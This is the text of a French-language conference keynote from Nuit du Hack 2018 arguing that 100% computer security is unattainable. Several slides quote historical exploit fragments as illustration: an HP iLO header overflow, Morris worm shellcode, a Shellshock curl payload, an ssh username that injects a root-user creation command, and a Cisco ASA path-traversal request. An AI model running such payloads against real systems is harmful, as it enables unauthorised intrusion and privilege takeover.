Slides for my keynote talk at the Nuit du Hack 2018 (in French). Audio is available from the YouTube presentation here : https://www.youtube.com/watch?v=zr_PQe0SZFA

1. Ceci n’est pas une Keynote
Gaël Delalleau
Kog.ai
@gaeldelalleau
Disclaimer : les slides de cette non-Keynote ont été réalisés avec Keynote®
NDH 2018

2. FAIR WARNING - expect:
…slides and talk in french
…subjective thoughts (trolling?)
…incomplete demonstrations
…offensive pics of turtles
…biased opinions which are my own, not
my employer’s (though I am self-employed, so… maybe they are not my opinions after
all. Or are they? Or…)

3. Progrès réalisés en 30 ans

4. Progrès réalisés en 30 ans
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP management interface exploit

5. Progrès réalisés en 30 ans
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP management interface exploit
for(j = 0; j < 28; j++)
buf[i+j] = "335217/sh0335217/bin320^Z33503350335Z335003320^
274;344371344342241256343350357256362351"[j];
l556 = 0x7fffe9fc;
l560 = 0x7fffe8a8;
l564 = 0x7fffe8bc;
l568 = 0x28000000;
l552 = 0x0001c020;
write(s, buf, sizeof(buf));
UNIX network service exploit

6. Progrès réalisés en 30 ans
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP management interface exploit
for(j = 0; j < 28; j++)
buf[i+j] = "335217/sh0335217/bin320^Z33503350335Z335003320^
274;344371344342241256343350357256362351"[j];
l556 = 0x7fffe9fc;
l560 = 0x7fffe8a8;
l564 = 0x7fffe8bc;
l568 = 0x28000000;
l552 = 0x0001c020;
write(s, buf, sizeof(buf));
UNIX network service exploit
CVE-2017-12542

7. Progrès réalisés en 30 ans
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HP management interface exploit
for(j = 0; j < 28; j++)
buf[i+j] = "335217/sh0335217/bin320^Z33503350335Z335003320^
274;344371344342241256343350357256362351"[j];
l556 = 0x7fffe9fc;
l560 = 0x7fffe8a8;
l564 = 0x7fffe8bc;
l568 = 0x28000000;
l552 = 0x0001c020;
write(s, buf, sizeof(buf));
UNIX network service exploit
CVE-2017-12542
Ver de Morris (1988)

8. Les trois règles d’or de la sécurité
informatique (~1990)
Recommandations (2018)
• « Do not connect iLO to your network if the interface is not actually used
• Do not expose any iLO interface to any untrusted network »

9. curl -H "User-Agent: () { :; }; /bin/xxxxxx" http://example.com/
Shellshock (2014)
ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)’@example.com
Dell EMC Recoverpoint (2018)
Cisco ASA (2018)
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"

10. Mais pourquoi ?

11. Notre quête : la sécurité à 100%

12. Poll : la sécurité à 100%

13. La métacryptoblockchaincurrency

14. Ethereum Yellow Paper (2014)

19. La Preuve Mathématique

20. Petits détails…
• Décidabilité
• Complexité (NP / combinatoire…)
• « Computational irreducibility »

21. Wolfram’s rule 30

22. Wolfram’s rule 30

23. En pratique
• Spécification du modèle : existante ? prouvée ? couvrant tous les
besoins sécurité ?
• Confiance sur toute la chaîne : Preuve du prouveur ? De tous les
outils ? De l’environnement d’exécution ? Du système complet ?
• Implémentation du modèle et des outils : prouvée ? immutable ?
• Interactions avec l’environnement : intégrables dans le modèle ?
• Weird machines
• Evolution dynamique dans le temps
• Changements de paradigme

24. En pratique
• Spécification du modèle : existante ? prouvée ? couvrant tous les
besoins sécurité ?
• Confiance sur toute la chaîne : Preuve du prouveur ? De tous les
outils ? De l’environnement d’exécution ? Du système complet ?
• Implémentation du modèle et des outils : prouvée ? immutable ?
• Interactions avec l’environnement : intégrables dans le modèle ?
• Weird machines
• Evolution dynamique dans le temps
• Changements de paradigme

27. Heureusement, il y a…

28. l’Intel®ligence(™) Artificielle© !

34. Les systèmes de calcul
automatisés et biologiques
ne sont donc pas près
d’être 100% prévisibles, et
donc sécurisés !

35. Tout est interaction donc tout est calcul

37. Si rien n’est sécurisé…
…tout devient possible ?

38. Hack the planet !
(pour la comprendre et l’améliorer)